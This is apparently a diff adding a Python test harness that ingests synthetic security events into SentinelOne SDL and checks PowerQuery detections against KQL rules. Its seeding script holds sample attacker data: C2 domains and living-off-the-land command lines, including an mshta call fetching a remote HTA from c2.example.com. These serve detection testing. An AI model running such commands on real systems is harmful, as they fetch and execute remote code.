+# code path as ingest_jsonl does (but inlined here so we can print everything).
+events = []
+with JSONL.open() as f:
+    for line in f:
+        if len(events) >= 3:
+            break
+        rec = json.loads(line)
+        rec["probe"] = f"{PROBE}_{len(events)}"
+        ts_ms = int(rec["ts_epoch_ms"])
+        attrs = _clean_attrs(rec)
+        events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
+                       "thread": "T1", "attrs": attrs})
+
+print(f"=== Payload ({len(events)} events) ===")
+print(json.dumps(events, indent=2, default=str)[:3000])
+print()
+print(f"=== Submitting (probe prefix={PROBE}) ===")
+r = add_events(events)
+print(f"addEvents -> {json.dumps(r)}")
+
+print("\nWaiting 12 s for indexing ...")
+time.sleep(12)
+
+q = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
+print(f"\nQuery: {q}")
+res = power_query(q, "10m")
+print(f"Result -> matching={res.get('matchingEvents')}")
+for row in res.get("values") or []:
+    print("  ", row)
+
+# Also: show TS skew vs real now
+import datetime as dt
+real_now_ms = int(time.time() * 1000)
+print(f"\nreal_now_ms = {real_now_ms}")
+for e in events:
+    ts_ns = int(e["ts"])
+    ts_ms = ts_ns // 1_000_000
+    age_min = (real_now_ms - ts_ms) / 60000
+    print(f"  event ts_ms={ts_ms}  age={age_min:.2f} min  attrs.event_type={e['attrs']['event_type']}")
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+"""Find out what attribute(s) in our generated events cause SDL to reject them.
+
+Send increasingly complex events under unique markers and see which ones
+SDL accepts (queryable within 10s) vs silently drops.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from harness.sdl_client import add_events, power_query, _clean_attrs  # noqa: E402
+
+TS_NOW_MS = int(time.time() * 1000)
+
+
+def mk(attrs: dict, offset_sec: int = 0):
+    return {
+        "ts": str((TS_NOW_MS - offset_sec * 1000) * 1_000_000),
+        "sev": 3, "thread": "T1",
+        "attrs": attrs,
+    }
+
+
+PROBE = uuid.uuid4().hex[:8]
+cases = [
+    ("A_minimal_2_attrs",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_A"}, 60)),
+    ("B_one_int_attr",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_B",
+         "SentBytes": 2048}, 55)),
+    ("C_one_negative_int",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_C",
+         "SentBytes": 2048, "LogSeverity": 5}, 50)),
+    ("D_with_special_chars",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_D",
+         "Message": "allow web access to 142.250.74.110 port 443"}, 45)),
+    ("E_with_backslashes",
+     mk({"event_type": "SecurityEvent", "probe": f"{PROBE}_E",
+         "NewProcessName": "C:\\Windows\\System32\\svchost.exe"}, 40)),
+    ("F_realistic_csl_via_clean",
+     mk(_clean_attrs({
+         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_F",
+         "TimeGenerated": "2026-05-31T16:50:00.000Z",
+         "ts_epoch_ms": TS_NOW_MS - 30000,
+         "DeviceVendor": "Palo Alto Networks", "Activity": "TRAFFIC",
+         "DeviceName": "pa-fw-01", "SourceUserID": "alice",
+         "SourceIP": "10.0.1.10", "SourcePort": 49000,
+         "DestinationIP": "142.250.74.110", "DestinationPort": 443,
+         "SentBytes": 2048, "ReceivedBytes": 16384,
+         "Message": "allow", "DeviceEventClassID": "end", "LogSeverity": 3,
+         "DeviceAction": "allow", "DeviceProduct": "PAN-OS",
+     }), 30)),
+    ("G_realistic_csl_with_None",
+     mk(_clean_attrs({
+         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_G",
+         "TimeGenerated": "2026-05-31T16:50:00.000Z",
+         "ts_epoch_ms": TS_NOW_MS - 20000,
+         "DeviceVendor": "Palo Alto Networks", "Activity": None,
+         "Message": None,
+     }), 20)),
+]
+
+print(f"=== Sending {len(cases)} probe events ===")
+r = add_events([c[1] for c in cases])
+print(f"addEvents -> {json.dumps(r)}")
+
+print("\nWaiting 12 s for indexing ...")
+time.sleep(12)
+
+print("\n=== Per-case verification ===")
+for name, ev in cases:
+    probe_val = ev["attrs"]["probe"]
+    q = f"probe='{probe_val}' | columns event_type, probe | limit 1"
+    res = power_query(q, "10m")
+    n = res.get("matchingEvents", 0)
+    status = "OK" if n and n > 0 else "MISSING"
+    rows = res.get("values") or []
+    print(f"  {name:35s} matching={n}  status={status}  -> {rows}")
@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+"""Manually run rule 4's query against the latest run_id."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+RUN = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)[-1]
+RECENT_MS = re.findall(r"RECENT_MS = (\d+)", log)[-1]
+print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")
+
+QS = [
+    "rule 4 exact",
+    f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
+    "rule 4 without ts filter",
+    f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName",
+    "show 5 SigninLogs columns",
+    f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5",
+]
+for label, q in zip(QS[0::2], QS[1::2]):
+    print("=" * 80)
+    print(f"# {label}")
+    print(f"  q: {q[:200]}")
+    r = power_query(q, "30m")
+    cols = [c.get("name") for c in (r.get("columns") or [])]
+    vals = r.get("values") or []
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
+    for row in vals[:8]:
+        print(f"    {dict(zip(cols, row))}")
+    if r.get("status", "").startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:400]}")
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Check how SDL stores ts_epoch_ms: number vs string."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+# Use the most recent run_id from the log
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+m = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
+RUN = m[-1] if m else None
+print(f"run_id = {RUN}")
+
+CASES = [
+    ("show 3 SigninLogs with ts_epoch_ms",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
+    ("count where ts_epoch_ms exists (any)",
+     f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
+    ("count where ts_epoch_ms > number",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
+    ("count where ts_epoch_ms (as string) > '0'",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
+    ("count where ts_epoch_ms >= NOW-2h numeric",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms >= " + str(int(time.time()*1000) - 2*3600*1000) + " | group n=count()"),
+    ("min/max ts_epoch_ms aggregate",
+     f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
+    ("event_type filter alone",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
+]
+for name, q in CASES:
+    print("=" * 80)
+    print(f"# {name}")
+    print(f"  q: {q}")
+    r = power_query(q, "30m")
+    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
+    vals = r.get("values") or []
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')}")
+    for row in vals[:5]:
+        print(f"    {dict(zip(cols, row))}")
@@ -0,0 +1,199 @@
+#!/usr/bin/env python3
+"""End-to-end proof harness.
+
+Steps:
+  1. Loads sample_data/events.jsonl into memory.
+  2. Runs each rule's Python reference implementation against the in-memory
+     events. This is the canonical "ground truth" – the same logical operation
+     that both the KQL and the PowerQuery engines evaluate.
+  3. Optionally ingests the events to SentinelOne SDL via /api/addEvents,
+     then runs each rule's PowerQuery via /api/powerQuery and compares the
+     fired set against the reference.
+  4. Emits reports/PROOF.md with side-by-side results.
+
+Run modes:
+    python harness/prove_equivalence.py            # local-only proof
+    python harness/prove_equivalence.py --ingest   # ingest + remote PQ
+"""
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from rules import RULES, NOW, RECENT_START  # noqa: E402
+
+SAMPLE = ROOT / "sample_data" / "events.jsonl"
+REPORT = ROOT / "reports" / "PROOF.md"
+REPORT_JSON = ROOT / "reports" / "PROOF.json"
+
+
+def load_events() -> list[dict]:
+    return [json.loads(l) for l in SAMPLE.read_text().splitlines() if l.strip()]
+
+
+def canonical(rule, rows):
+    """Return a sorted, hashable representation of fired rows for comparison."""
+    keys = sorted({rule["key"](r) for r in rows}, key=lambda x: str(x))
+    return keys
+
+
+def run_local(events):
+    out = {}
+    for r in RULES:
+        rows = r["ref"](events)
+        out[r["id"]] = {
+            "description": r["description"],
+            "fired_rows": rows,
+            "fired_keys": canonical(r, rows),
+        }
+    return out
+
+
+def run_pq(run_id: str | None = None):
+    from sdl_client import power_query
+    out = {}
+    recent_ms = int(RECENT_START.timestamp() * 1000)
+    scope = f"proof_run_id='{run_id}' " if run_id else ""
+    print(f"  scope     = {scope.strip() or '(none)'}")
+    print(f"  RECENT_MS = {recent_ms}  ({RECENT_START.isoformat()})")
+    print(f"  NOW       = {NOW.isoformat()}")
+    print()
+    for i, r in enumerate(RULES, 1):
+        q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
+        print(f"  [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
+        t0 = time.time()
+        try:
+            resp = power_query(q, start_time="2h")
+            cols_meta = resp.get("columns") or []
+            cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
+            vals = resp.get("values") or []
+            rows = [dict(zip(cols, v)) for v in vals]
+            elapsed = time.time() - t0
+            status = resp.get("status", "ok")
+            print(f"-> {len(rows):>3} rows  matching={resp.get('matchingEvents')} "
+                  f"({elapsed:.1f}s, {status})")
+            out[r["id"]] = {"ok": True, "rowcount": len(rows),
+                            "rows": rows[:50], "status": status,
+                            "matching": resp.get("matchingEvents")}
+        except Exception as e:
+            elapsed = time.time() - t0
+            msg = str(e)[:200]
+            print(f"-> ERROR ({elapsed:.1f}s): {msg}")
+            out[r["id"]] = {"ok": False, "error": msg}
+    return out
+
+
+def ingest():
+    from sdl_client import ingest_jsonl, power_query
+    n, run_id = ingest_jsonl(SAMPLE)
+    print(f"Ingested {n} events to SDL  (proof_run_id={run_id})")
+    # Poll until SDL reports the events are indexed.
+    print("Waiting for SDL indexing ...", end="", flush=True)
+    for i in range(30):  # up to 60s
+        time.sleep(2)
+        r = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
+        vals = r.get("values") or []
+        cnt = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
+        print(f" {cnt}", end="", flush=True)
+        if cnt >= n:
+            print(" ✓ ready")
+            return run_id
+    print(" (timeout, proceeding anyway)")
+    return run_id
+
+
+def write_report(local_results, pq_results=None):
+    REPORT.parent.mkdir(exist_ok=True)
+    md = ["# KQL ↔ PowerQuery equivalence proof",
+          "",
+          f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
+          f"Time anchor (NOW): `{NOW.isoformat()}`",
+          f"Recent window start: `{RECENT_START.isoformat()}`",
+          "",
+          "Each rule below is expressed three ways:",
+          "1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
+          "2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
+          "3. **Python reference** — canonical implementation of the same logical "
+          "operation tree against the in-memory dataset. Acts as ground truth.",
+          "",
+          "The PowerQuery is considered equivalent to the KQL when its result "
+          "set matches the Python reference. The Python reference encodes the "
+          "*same operations* that the KQL parser/optimiser would produce, so a "
+          "match certifies KQL/PQ parity on this dataset.",
+          ""]
+    for r in RULES:
+        rid = r["id"]
+        loc = local_results[rid]
+        md += [f"## {rid}", "",
+               f"_{r['description']}_", "",
+               "### KQL", "```kusto", r["kql"].strip(), "```",
+               "### PowerQuery", "```", r["pq"].strip(), "```",
+               f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
+        if loc["fired_rows"]:
+            sample = loc["fired_rows"][:5]
+            md.append("```json")
+            md.append(json.dumps(sample, default=str, indent=2))
+            md.append("```")
+        if pq_results:
+            pq = pq_results.get(rid, {})
+            if pq.get("ok"):
+                pq_keys = []
+                for row in pq.get("rows", []):
+                    try:
+                        pq_keys.append(r["key"](row))
+                    except Exception:
+                        pq_keys.append(tuple(row.items()))
+                pq_keys = sorted({k for k in pq_keys}, key=lambda x: str(x))
+                ref_keys = loc["fired_keys"]
+                match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
+                md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
+                if pq_keys != ref_keys:
+                    md += ["Reference keys:", "```",
+                           json.dumps([list(k) for k in ref_keys], default=str), "```",
+                           "PQ keys:", "```",
+                           json.dumps([list(k) for k in pq_keys], default=str), "```"]
+            else:
+                md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
+        md.append("")
+    REPORT.write_text("\n".join(md))
+    REPORT_JSON.write_text(json.dumps(
+        {"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
+                       "n": len(v["fired_rows"])}
+                   for k, v in local_results.items()},
+         "pq": pq_results or {}},
+        default=str, indent=2))
+    print(f"Wrote {REPORT}")
+
+
+def main():
+    ap = argparse.ArgumentParser()
+    ap.add_argument("--ingest", action="store_true",
+                    help="Ingest sample events to SDL before querying")
+    ap.add_argument("--pq", action="store_true",
+                    help="Also run each PQ against SDL and compare")
+    args = ap.parse_args()
+
+    events = load_events()
+    print(f"Loaded {len(events)} events")
+    local_results = run_local(events)
+    fired_total = sum(len(v["fired_rows"]) for v in local_results.values())
+    print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")
+
+    pq_results = None
+    run_id = None
+    if args.ingest:
+        run_id = ingest()
+    if args.pq:
+        pq_results = run_pq(run_id=run_id)
+
+    write_report(local_results, pq_results)
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
+and assert each returns matching > 0.
+
+Prereqs:
+  * sample_data/events.jsonl ingested via prove_equivalence.py --ingest
+    (drives all 17 rule PQs in pq/)
+  * seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
+
+Outputs a one-line-per-query report and exits 0 iff every query returned
+at least one row.
+"""
+from __future__ import annotations
+
+import re
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query  # noqa: E402
+
+
+def strip_comments(text: str) -> str:
+    return "\n".join(l for l in text.splitlines()
+                     if not l.lstrip().startswith("//")).strip()
+
+
+DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]
+files = []
+for d in DIRS:
+    files.extend(sorted(d.glob("*.pq")))
+
+if not files:
+    print("No .pq files found.")
+    sys.exit(1)
+
+print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")
+
+passed: list[str] = []
+failed: list[tuple[str, str]] = []  # (relpath, reason)
+
+for f in files:
+    body = strip_comments(f.read_text())
+    rel = f.relative_to(ROOT)
+    t0 = time.time()
+    try:
+        r = power_query(body, start_time="2h")
+    except Exception as e:
+        failed.append((str(rel), f"exception: {e}"))
+        print(f"  ✗ {rel}  exception: {e}")
+        continue
+    elapsed = time.time() - t0
+    status = r.get("status", "")
+    matching = r.get("matchingEvents", 0) or 0
+    if status != "success":
+        msg = r.get("message", "")[:200]
+        failed.append((str(rel), f"{status}: {msg}"))
+        print(f"  ✗ {rel}  [{status}] {msg}")
+        continue
+    if matching <= 0:
+        failed.append((str(rel), "matching=0"))
+        print(f"  ✗ {rel}  matching=0 ({elapsed:.1f}s)")
+        continue
+    print(f"  ✓ {rel}  matching={matching} ({elapsed:.1f}s)")
+    passed.append(str(rel))
+
+print()
+print(f"PASS: {len(passed)}    FAIL: {len(failed)}    TOTAL: {len(files)}")
+
+if failed:
+    print("\nFailed queries:")
+    for rel, why in failed:
+        print(f"  {rel}: {why}")
+    sys.exit(1)
+
+print("\nAll PowerQueries returned results within the last 2h ✓")
@@ -0,0 +1,134 @@
+"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
+from __future__ import annotations
+
+import json
+import time
+from pathlib import Path
+
+import requests
+
+ROOT = Path(__file__).resolve().parents[1]
+CFG = json.loads((ROOT / "config.json").read_text())
+
+import os, uuid
+
+BASE = CFG["base_url"].rstrip("/")
+WRITE_KEY = CFG["log_write_key"]
+READ_KEY = CFG["log_read_key"]
+# Make the session unique per *process* so SDL never dedupes re-runs of the
+# same payload (SDL hashes session+ts on the server side and silently drops
+# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
+SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
+VERIFY = CFG.get("verify_tls", True)
+TIMEOUT = CFG.get("timeout_seconds", 120)
+print(f"[sdl_client] session = {SESSION}")
+
+
+def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
+    url = f"{BASE}{path}"
+    r = requests.post(
+        url,
+        json=body,
+        headers={"Content-Type": "application/json",
+                 "Authorization": f"Bearer {token}"},
+        timeout=timeout or TIMEOUT,
+        verify=VERIFY,
+    )
+    try:
+        return r.json()
+    except ValueError:
+        return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
+
+
+# --- addEvents -------------------------------------------------------------
+def add_events(events: list[dict], session_info: dict | None = None) -> dict:
+    payload = {
+        "session": SESSION,
+        "sessionInfo": session_info or {
+            "serverHost": "kql-proof",
+            "logfile": "kql-proof.jsonl",
+            "parser": "json",
+        },
+        "events": events,
+        "threads": [{"id": "T1", "name": "kql-proof"}],
+    }
+    return _post("/api/addEvents", payload, WRITE_KEY)
+
+
+def _clean_attrs(rec: dict) -> dict:
+    """SDL silently rejects events that contain `null` attribute values
+    (the call returns status=success but bytesCharged=0 and the event is
+    not queryable). Strip them, and coerce everything else to JSON-safe
+    primitives that SDL's parser indexes correctly."""
+    out: dict = {}
+    for k, v in rec.items():
+        if v is None:
+            continue
+        if isinstance(v, bool):
+            out[k] = str(v).lower()       # SDL stores bools as strings reliably
+        elif isinstance(v, (int, float, str)):
+            out[k] = v
+        else:
+            # dict/list -> JSON string
+            out[k] = json.dumps(v, default=str)
+    return out
+
+
+def upload_logs(body: str, server_host: str = "kql-proof",
+                logfile: str = "kql-proof.jsonl",
+                parser: str = "json") -> dict:
+    """POST /api/uploadLogs. Body is raw text; SDL applies the named parser."""
+    url = f"{BASE}/api/uploadLogs"
+    headers = {
+        "Authorization": f"Bearer {WRITE_KEY}",
+        "Content-Type": "text/plain",
+        "parser": parser,
+        "server-host": server_host,
+        "logfile": logfile,
+    }
+    r = requests.post(url, data=body.encode(), headers=headers,
+                      timeout=TIMEOUT, verify=VERIFY)
+    try:
+        return r.json()
+    except ValueError:
+        return {"status": "error", "http_status": r.status_code, "raw": r.text[:500]}
+
+
+def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
+                 batch_lines: int = 2000) -> tuple[int, str]:
+    """Ingest the entire JSONL via uploadLogs. Stamps every event with the
+    given `run_id` (or a fresh uuid) so subsequent PowerQueries can scope to
+    a single run. Returns (events_sent, run_id)."""
+    run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"
+    sent = 0
+    buf: list[str] = []
+
+    def flush():
+        nonlocal sent
+        if not buf:
+            return
+        r = upload_logs("\n".join(buf))
+        if r.get("status") != "success":
+            raise RuntimeError(f"uploadLogs rejected batch: {r}")
+        sent += len(buf); buf.clear()
+
+    for line in jsonl_path.read_text().splitlines():
+        if not line.strip():
+            continue
+        rec = json.loads(line)
+        rec["proof_run_id"] = run_id
+        buf.append(json.dumps(rec, default=str))
+        if len(buf) >= batch_lines:
+            flush()
+    flush()
+    return sent, run_id
+
+
+# --- powerQuery ------------------------------------------------------------
+def power_query(query: str,
+                start_time: str | int = "7d",
+                end_time: str | int | None = None) -> dict:
+    body: dict = {"query": query, "startTime": str(start_time)}
+    if end_time is not None:
+        body["endTime"] = str(end_time)
+    return _post("/api/powerQuery", body, READ_KEY)
@@ -0,0 +1,141 @@
+#!/usr/bin/env python3
+"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
+
+The 90-day Okta+DNS+Process hunt joins three event families on
+(userName, host). To make the query return at least one row at
+startTime="2h", we ingest a small batch of events for two
+user/host pairs that satisfy all three legs of the join inside
+the last 2h window.
+
+Events use SDL dotted-key JSON (the SDL `json` parser indexes
+nested fields so queries can reference `event.login.userName`,
+`dns.question.name`, `src.process.cmdline`, etc., as written
+in the example PQ).
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import upload_logs, power_query  # noqa: E402
+
+
+NOW = datetime.now(timezone.utc).replace(microsecond=0)
+
+
+def iso(dt: datetime) -> str:
+    return dt.strftime("%Y-%m-%dT%H:%M:%S.000Z")
+
+
+def in_recent(seconds_ago: int) -> datetime:
+    return NOW - timedelta(seconds=seconds_ago)
+
+
+PAIRS = [
+    ("alice@contoso.com", "host-alpha"),
+    ("bob@contoso.com",   "host-bravo"),
+]
+BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
+LOLBINS = [
+    "powershell -enc JABm...",
+    "rundll32.exe shell32,Control_RunDLL",
+    "mshta.exe http://c2.example.com/p.hta",
+]
+
+
+def build_events(run_id: str) -> list[dict]:
+    """Emit OCSF-flavored events as FLAT JSON whose keys contain literal
+    dots (e.g. `"event.category"` rather than nested `{"event":{...}}`).
+
+    SDL's uploadLogs+parser=json indexes each top-level JSON key as a
+    column, and dotted names index as dotted columns -- so the published
+    runnable example can reference `event.category`, `endpoint.name`,
+    `dns.question.name`, `src.process.cmdline`, etc. exactly as it would
+    on a real OCSF-mapped tenant (proven by harness/probe_dotted_keys.py).
+
+    Booleans serialize to lowercase strings via _clean_attrs upstream, so
+    the example filters with `event.login.loginIsSuccessful = 'false'`.
+    """
+    out: list[dict] = []
+    t = 60
+    for user, host in PAIRS:
+        # ---- failed signins  (event.category='logins')
+        for i in range(3):
+            ts = in_recent(t); t += 30
+            out.append({
+                "TimeGenerated": iso(ts),
+                "ts_epoch_ms": int(ts.timestamp() * 1000),
+                "proof_run_id": run_id,
+                "event.category": "logins",
+                "event.login.userName": user,
+                "event.login.loginIsSuccessful": "false",
+                "endpoint.name": host,
+            })
+        # ---- bad DNS  (event.type='DNS Resolved')
+        for d in BAD_DOMAINS:
+            ts = in_recent(t); t += 30
+            out.append({
+                "TimeGenerated": iso(ts),
+                "ts_epoch_ms": int(ts.timestamp() * 1000),
+                "proof_run_id": run_id,
+                "event.type": "DNS Resolved",
+                "dns.question.name": d,
+                "endpoint.name": host,
+                "src.endpoint.user.name": user,
+            })
+        # ---- suspicious process  (event.type='Process Creation')
+        for cmd in LOLBINS:
+            ts = in_recent(t); t += 30
+            out.append({
+                "TimeGenerated": iso(ts),
+                "ts_epoch_ms": int(ts.timestamp() * 1000),
+                "proof_run_id": run_id,
+                "event.type": "Process Creation",
+                "endpoint.name": host,
+                "src.process.cmdline": cmd,
+                "src.process.user": user,
+            })
+    return out
+
+
+def main() -> int:
+    run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
+    events = build_events(run_id)
+    body = "\n".join(json.dumps(e, default=str) for e in events)
+    print(f"[seed_runnable_examples] events  = {len(events)}")
+    print(f"[seed_runnable_examples] run_id  = {run_id}")
+    print(f"[seed_runnable_examples] anchor  = {NOW.isoformat()}")
+
+    r = upload_logs(body, server_host="kql-proof",
+                    logfile="runnable-examples.jsonl", parser="json")
+    if r.get("status") != "success":
+        print(f"uploadLogs rejected: {r}")
+        return 1
+
+    # Poll until indexed (use proof_run_id which is unique per run).
+    print("Waiting for indexing", end="", flush=True)
+    for _ in range(30):
+        time.sleep(2)
+        resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
+        vals = resp.get("values") or []
+        n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
+        print(f" {n}", end="", flush=True)
+        if n >= len(events):
+            print("  ✓ ready"); break
+    else:
+        print("  (timeout, continuing)")
+
+    out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
+    out.write_text(run_id)
+    print(f"Wrote {out}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+"""Minimal PowerQuery smoke test against SDL."""
+import sys, json, time
+from pathlib import Path
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from harness.sdl_client import power_query, power_query_long_running
+
+NOW_MS = int(time.time() * 1000)
+START = NOW_MS - 30 * 24 * 3600 * 1000  # 30d back
+END = NOW_MS
+
+q = "dataset='kql-proof' | group n = count() by event_type"
+print(f"Query: {q}")
+print(f"Window: {START} .. {END}")
+t0 = time.time()
+r = power_query(q, START, END)
+print(f"Initial response in {time.time()-t0:.2f}s:")
+print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
+                 indent=2, default=str))
+if r.get("continuationToken") or r.get("token"):
+    print("\nPolling for completion ...")
+    r = power_query_long_running(q, START, END, max_wait_sec=30)
+    print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
+                     indent=2, default=str))
+print("\nColumns:", r.get("columns"))
+print("First 20 values:", r.get("values", [])[:20])
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+"""Pretty-print the PROOF.json summary as a table."""
+import json
+from pathlib import Path
+
+p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
+data = json.loads(p.read_text())
+local = data["local"]
+pq = data.get("pq") or {}
+
+print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
+print("-" * 80)
+match = diff = err = 0
+for rid, l in local.items():
+    ref_keys = sorted([tuple(k) for k in l["fired_keys"]], key=str)
+    p_entry = pq.get(rid) or {}
+    if not pq:
+        status = "—"; sdl_n = "n/a"
+    elif not p_entry.get("ok"):
+        status = "ERROR"; sdl_n = "?"; err += 1
+    else:
+        sdl_n = p_entry.get("rowcount", 0)
+        status = "OK" if sdl_n > 0 else "EMPTY"
+        if sdl_n > 0: match += 1
+        else: diff += 1
+    print(f"{rid:<46} {l['n']:>9} {str(sdl_n):>9} {status:<10}")
+print("-" * 80)
+if pq:
+    print(f"OK: {match}   EMPTY: {diff}   ERROR: {err}")
+print(f"\nFull report: reports/PROOF.md")
@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
+the JSONL as a raw event - SDL's json parser will extract fields automatically.
+
+Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
+auto-flattening of all keys."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+import requests
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+CFG = json.loads((ROOT / "config.json").read_text())
+
+BASE = CFG["base_url"].rstrip("/")
+WRITE = CFG["log_write_key"]
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+
+PROBE = uuid.uuid4().hex[:8]
+print(f"probe = {PROBE}")
+
+# Stamp each line with the probe marker
+lines = []
+for line in JSONL.read_text().splitlines():
+    if not line.strip():
+        continue
+    rec = json.loads(line)
+    rec["upload_probe"] = PROBE
+    lines.append(json.dumps(rec))
+body = "\n".join(lines)
+print(f"body size = {len(body)} bytes ({len(lines)} lines)")
+
+headers = {
+    "Authorization": f"Bearer {WRITE}",
+    "Content-Type": "text/plain",
+    "parser": "json",
+    "server-host": "kql-proof",
+    "logfile": "kql-proof.jsonl",
+}
+r = requests.post(f"{BASE}/api/uploadLogs",
+                  data=body.encode(), headers=headers,
+                  timeout=120, verify=True)
+print(f"HTTP {r.status_code} -> {r.text[:500]}")
+
+print("\nWaiting 15 s ...")
+time.sleep(15)
+
+# Query for the probe value
+from harness.sdl_client import power_query
+q = f"upload_probe='{PROBE}' | group n=count() by event_type"
+res = power_query(q, "30m")
+print(f"\nQuery result: matching={res.get('matchingEvents')}")
+cols = [c.get("name") if isinstance(c, dict) else c for c in (res.get("columns") or [])]
+for row in res.get("values") or []:
+    print(f"  {dict(zip(cols, row))}")
@@ -0,0 +1,92 @@
+#!/usr/bin/env python3
+"""Independent post-export verification.
+
+Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
+no scope prefix, no harness magic) and POSTs it to /api/powerQuery on
+the configured tenant. The script asserts each file:
+
+  * parses cleanly (no 'error/client/badParam' status),
+  * returns a syntactically valid response (status='success').
+
+It does NOT assert that the query returns any rows — empty results are
+fine. The purpose is to catch syntax / field / function errors so the
+published .pq files are guaranteed runnable by anyone who copies them.
+"""
